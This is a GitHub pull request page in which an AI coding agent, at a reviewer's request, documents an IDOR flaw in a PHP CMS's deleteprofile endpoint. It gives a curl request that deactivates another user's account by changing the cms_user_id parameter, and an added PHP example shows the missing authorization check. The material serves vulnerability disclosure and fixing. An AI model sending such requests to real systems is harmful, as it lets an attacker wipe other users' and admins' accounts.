
Provide CURL command demonstrating IDOR vulnerability in deleteprofile endpoint #815

Closed
Copilot wants to merge 2 commits into single-now-for-sequential-db-operations from copilot/sub-pr-814

Conversation

Contributor

Copilot AI commented Feb 4, 2026

Responds to review feedback requesting demonstration of the IDOR (Insecure Direct Object Reference) attack in the deleteprofile.php AJAX endpoint.

Response Provided

Documented the CURL command showing how an authenticated attacker can deactivate any user account by manipulating the cms_user_id POST parameter:

curl -X POST 'http://localhost:8000/ajax.php?file=deleteprofile' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Cookie: PHPSESSID=<attacker_session_id>' \
  -d 'cms_user_id=<victim_user_id>'

The vulnerability exists because the endpoint accepts $_POST['cms_user_id'] directly in the UPDATE query and simpleSaveChangeHistory() call without verifying the authenticated user has permission to delete that account. Any authenticated user can delete any other user (including admins) by supplying a different user ID.

Note: This PR only provides the demonstration. The security fix is tracked in the parent PR #814.
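As an added illustration (not code from this PR, the parent PR #814, or the repository), here is the authorization check a deleteprofile-style handler needs before its UPDATE, placed next to a comment describing the vulnerable pattern the PR body reports; the session keys, the table name and the $pdo connection are assumptions:

```php
<?php
// Added example, not the project's code. Assumed: the CMS stores the logged-in
// user's id in $_SESSION['cms_user_id'], their role in $_SESSION['cms_role'],
// and $pdo is an existing PDO connection.
session_start();
header('Content-Type: application/json');

// Vulnerable pattern (as described in the PR): the handler ran
//   UPDATE ... WHERE id = $_POST['cms_user_id']
// and logged the change, without comparing that id to the session user.

function currentUserId(): ?int {
    return isset($_SESSION['cms_user_id']) ? (int) $_SESSION['cms_user_id'] : null;
}

function isAdmin(): bool {
    return ($_SESSION['cms_role'] ?? '') === 'admin';
}

// Authorization decision: a user may deactivate only their own account,
// unless they are an admin. An unauthenticated caller gets nothing.
function mayDeactivate(?int $actor, int $target, bool $actorIsAdmin): bool {
    if ($actor === null) {
        return false;
    }
    return $actorIsAdmin || $actor === $target;
}

$actor  = currentUserId();
$target = filter_input(INPUT_POST, 'cms_user_id', FILTER_VALIDATE_INT);

if ($target === false || $target === null) {
    http_response_code(400);
    echo json_encode(['error' => 'invalid cms_user_id']);
    exit;
}

if (!mayDeactivate($actor, $target, isAdmin())) {
    // A 403 here is worth logging: repeated denials on this endpoint are a
    // detection signal for someone probing other users' ids.
    http_response_code(403);
    error_log("deleteprofile: user {$actor} denied deactivating user {$target}");
    echo json_encode(['error' => 'forbidden']);
    exit;
}

// Only the authorized, validated id reaches the database, via a prepared statement.
$stmt = $pdo->prepare('UPDATE cms_users SET active = 0 WHERE id = :id');
$stmt->execute([':id' => $target]);
echo json_encode(['ok' => true]);
```

The check binds the target id to the session identity rather than trusting the POST body, which is the missing step the PR body describes.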



…e endpoint

Co-authored-by: pylipp <10617122+pylipp@users.noreply.github.com>
Copilot AI changed the title [WIP] Update timestamp parameter in simpleSaveChangeHistory Provide CURL command demonstrating IDOR vulnerability in deleteprofile endpoint Feb 4, 2026
Copilot AI requested a review from pylipp February 4, 2026 17:45
@pylipp pylipp closed this Feb 5, 2026
